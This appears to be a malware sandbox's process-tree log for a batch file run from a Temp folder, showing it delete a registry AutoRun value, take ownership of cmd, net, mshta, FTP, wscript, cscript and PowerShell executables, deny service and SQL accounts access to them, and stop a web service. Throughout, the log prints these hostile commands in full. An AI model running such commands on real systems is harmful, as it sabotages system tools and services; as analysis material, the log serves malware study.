C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Wfhvyrkill$-arab.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f3⤵PID:1864
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\cmd.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1100 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1372
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /g Administrators:f3⤵PID:2348
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1136
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /g Users:r3⤵PID:3848
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1816
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /g Administrators:r3⤵PID:2324
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1656
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d SERVICE3⤵PID:4316
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d mssqlserver3⤵PID:740
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3564
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4388
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d "network service"3⤵PID:3340
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2140
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /g system:r3⤵PID:532
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4884
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress3⤵PID:4064
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\cmd.exe /a3⤵
- Modifies file permissions
PID:4732 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3872
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f3⤵PID:4116
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:380
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r3⤵PID:1924
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2296
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r3⤵PID:5076
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4564
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE3⤵PID:4876
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1020
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver3⤵PID:2000
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2408
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"3⤵PID:4716
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1492
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g system:r3⤵PID:2868
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress3⤵PID:1340
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1004
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\net.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4580 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3860
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /g Administrators:f3⤵PID:4376
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3388
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /g Users:r3⤵PID:4300
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /g Administrators:r3⤵PID:2384
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3524
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d SERVICE3⤵PID:3048
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:676
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3828
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d mssqlserver3⤵PID:804
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4292
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d "network service"3⤵PID:608
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d system3⤵PID:3180
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2744
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2088
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress3⤵PID:4108
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\net.exe /a3⤵
- Modifies file permissions
PID:4212 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4788
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /g Administrators:f3⤵PID:744
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /g Users:r3⤵PID:3076
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1312
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r3⤵PID:4088
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4008
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4760
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d SERVICE3⤵PID:4400
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver3⤵PID:4976
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1940
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1728
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d "network service"3⤵PID:1864
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:636
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d system3⤵PID:1484
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3128
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress3⤵PID:1572
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\net1.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5056 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1956
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /g Administrators:f3⤵PID:1532
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1528
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /g Users:r3⤵PID:4124
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3492
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /g Administrators:r3⤵PID:3644
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4332
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d SERVICE3⤵PID:3648
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d mssqlserver3⤵PID:4900
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:216
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3464
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d "network service"3⤵PID:3676
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1252
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d system3⤵PID:3656
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4528
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress3⤵PID:3692
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\net1.exe /a3⤵
- Modifies file permissions
PID:1744 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:264
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /g Administrators:f3⤵PID:276
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:296
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /g Users:r3⤵PID:2520
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4252
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r3⤵PID:4396
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4484
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE3⤵PID:4504
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4316
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver3⤵PID:3772
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4352
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d "network service"3⤵PID:4348
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2336
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d system3⤵PID:4780
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:840
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress3⤵PID:824
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\mshta.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4644 -
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /g Administrators:f3⤵PID:4200
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4732
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1428
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /g Users:r3⤵PID:920
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5076
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /g Administrators:r3⤵PID:4084
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3140
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d SERVICE3⤵PID:508
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4716
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d mssqlserver3⤵PID:1128
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d "network service"3⤵PID:2868
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4552
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2020
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d system3⤵PID:64
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1344
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress3⤵PID:1468
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\mshta.exe /a3⤵
- Modifies file permissions
PID:3860 -
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f3⤵PID:1548
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4376
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r3⤵PID:3424
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3636
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4392
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r3⤵PID:3528
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE3⤵PID:4704
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4908
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1324
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"3⤵PID:4640
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4912
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver3⤵PID:1044
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2760
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d system3⤵PID:2168
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4932
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress3⤵PID:436
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\FTP.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4444 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3784
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /g Administrators:f3⤵PID:4368
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4212
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /g Users:r3⤵PID:1440
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4104
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /g Administrators:r3⤵PID:4340
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1312
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d SERVICE3⤵PID:5048
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1936
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d mssqlserver3⤵PID:5116
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4952
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d "network service"3⤵PID:4824
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4980
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d system3⤵PID:1848
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1732
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress3⤵PID:1728
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\FTP.exe /a3⤵
- Modifies file permissions
PID:3984 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1100
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f3⤵PID:1484
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3280
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r3⤵PID:1572
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r3⤵PID:3372
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2236
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3680
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE3⤵PID:1528
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1588
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver3⤵PID:1664
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3500
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"3⤵PID:4332
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d system3⤵PID:216
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3684
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1108
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress3⤵PID:2836
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\wscript.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4572 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4208
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /g Administrators:f3⤵PID:2432
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2324
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /g Users:r3⤵PID:292
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /g Administrators:r3⤵PID:276
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:288
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1796
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UFIDAWebService4⤵PID:2300
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d SERVICE3⤵PID:3980
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3732
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d mssqlserver3⤵PID:4744
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2092
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d "network service"3⤵PID:4320
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4316
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d system3⤵PID:3560
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4352
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress3⤵PID:432
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\wscript.exe /a3⤵
- Modifies file permissions
PID:672 -
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f3⤵PID:820
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4780
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:824
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r3⤵PID:1412
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1052
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r3⤵PID:3316
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE3⤵PID:4144
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4732
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1428
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver3⤵PID:3352
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5076
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"3⤵PID:1964
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1636
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d system3⤵PID:3140
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3156
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress3⤵PID:1492
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\cscript.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1332 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2468
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /g Administrators:f3⤵PID:1340
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1148
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /g Users:r3⤵PID:1856
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3628
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /g Administrators:r3⤵PID:3740
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d SERVICE3⤵PID:2004
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4376
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3636
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d mssqlserver3⤵PID:1404
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1308
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d "network service"3⤵PID:3920
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3048
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d system3⤵PID:4688
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1444
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress3⤵PID:4488
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\cscript.exe /a3⤵
- Modifies file permissions
PID:4292 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3932
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f3⤵PID:2744
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4412
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r3⤵PID:1460
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4340
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r3⤵PID:4092
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE3⤵PID:1936
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4008
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver3⤵PID:4952
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4760
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"3⤵PID:4808
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:800
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1896
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d system3⤵PID:3444
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:636
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress3⤵PID:3068
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3128 -
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵PID:1480
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5056
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵PID:4812
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2236
-
